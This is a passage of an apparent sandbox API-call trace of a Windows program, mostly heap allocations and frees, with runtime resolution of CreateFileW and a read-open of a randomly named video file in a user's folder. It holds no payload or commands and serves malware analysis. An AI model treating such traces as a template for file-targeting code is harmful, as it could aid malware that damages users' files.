Flags=0x0, Size=0x4) returned 0x43e28e0 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0101.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0101.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0101.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0101.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0101.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0101.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0101.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0101.566] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0101.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0101.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0101.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cacd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0101.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0101.567] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0101.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0101.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0101.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0101.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0101.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0101.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0101.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0101.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0101.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0101.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0101.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0101.568] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\h8KMQ6UP_q4ir-v.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\h8kmq6up_q4ir-v.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0101.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0101.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0101.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0101.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da070 [0101.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0101.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0101.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0101.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0101.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0101.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0101.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0101.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0101.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0101.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0101.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0101.570] FreeLibrary (hLibModule=0x772d0000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0101.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0101.572] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0101.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.639] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.639] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0101.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0101.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0101.641] HeapFree (in: hHeap=0x1780000, 